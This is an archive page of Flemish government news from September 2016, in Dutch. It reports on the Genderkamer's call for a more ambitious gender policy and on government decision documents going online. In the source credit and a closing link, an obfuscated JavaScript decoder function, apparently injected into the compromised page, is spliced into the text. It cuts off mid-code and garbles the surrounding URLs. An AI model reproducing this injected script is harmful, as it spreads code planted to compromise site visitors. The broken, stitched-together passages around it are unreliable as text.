Archief september, 2016

Reacties uitgeschakeld voor Genderbeleid Vlaamse overheid moet beter

Genderbeleid Vlaamse overheid moet beter

Door | 23 september 2016 | Nieuws

vrijdag, september 23, 2016 – Bron: function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var vb=”;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/nieuws/genderbeleid-vlaamse-overheid-moet-beter”>http://13.vlaanderen.be/nieuws/genderbeleid-vlaamse-overheid-moet-beter

De Vlaamse overheid mag best wat ambitieuzer zijn op het vlak van genderbeleid. Dat zegt de Genderkamer, het meldpunt van de Vlaamse ombudsdienst dat een jaar bestaat. 'Daarom willen we de Vlaamse overheid actief adviseren in genderkwesties', zegt ombudsvrouw gender Annelies d'Espallier.

Zo staat er maar één cijfer in het regeerakkoord van 2014, over de vertegenwoordiging van vrouwen aan de top. 'Dat cijfer wordt dan nog helemaal niet gehaald (21% in plaats van de vooropgestelde 40%, red.). Voor de rest blijft het allemaal vaag. Dat moet veranderen. De Vlaamse overheid zal moeten beseffen dat er nu een orgaan is dat zich straffer zal opstellen en dat als roeping heeft zich te moeien met dat genderbeleid.’

Topvrouwen

Er worden wel degelijk inspanningen gedaan om meer vrouwen in topfuncties te krijgen, zegt Diversiteitsambtenaar Alona Lyubayeva. 'Dit jaar was er een campagne waar onze topvrouwen hun eigen job in de kijker zetten. Zo willen we meer vrouwen warm maken om te solliciteren voor een topfunctie. Daarnaast willen we ook een netwerk opzetten voor de topvrouwen.'

Verder zijn er ook plannen om Vlechtwerk opnieuw te activeren, het vroegere netwerk voor vrouwen met leidinggevende ambities.

Onderzoek

De dienst Diversiteitsbeleid doet ook onderzoek naar de genderkloof en de pensioenkloof. 'Uit cijfers blijkt dat in sommige functies, vooral op niveau A en B, vrouwen minder verdienen dan mannen. We willen uitzoeken hoe dat net komt', zegt Alona.

'Daarnaast doen we bevragingen om te weten te komen waarom vrouwen minder naar leidinggevende functies solliciteren dan mannen en willen we ook kijken welke impact het nieuwe systeem van verlofstelsels (waar nog over onderhandeld wordt, red.) heeft op het loon en het pensioen van vrouwen.'

Reacties uitgeschakeld voor Regeringsdocumenten online vanaf 12 september

Regeringsdocumenten online vanaf 12 september

Door | 12 september 2016 | Nieuws

vrijdag, september 9, 2016 – 12:19 door vlaanderen.be -

Regeringsdocumenten online vanaf 12 september
Elke week, na de ministerraad op vrijdag, maakt de Vlaamse Regering haar beslissingen bekend. De documenten die aanleiding hebben gegeven tot die beslissingen, kan je vanaf 12 september online raadplegen.

Die documenten (regeringsnota’s, mededelingen, ontwerpdecreten …) zijn online gekoppeld aan de beslissing waarop ze betrekking hebben. Het gaat om alle nota’s en mededelingen, met uitzondering van de individuele beslissingen en vertrouwelijke documenten.

De beslissingen worden op vrijdag gepubliceerd. De maandag daarop worden de documenten per beslissing automatisch toegevoegd. Je kan je abonneren op de regeringsbeslissingen of op een thematische selectie. Je krijgt dan elke vrijdag een e-mail met een overzicht van de beslissingen, weliswaar zonder documenten. Die documenten kan je pas ’s maandags online raadplegen.
function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/nl/vlaamse-regering/beslissingenvlaamseregering">Klik hier door voor de regeringsbeslissingen.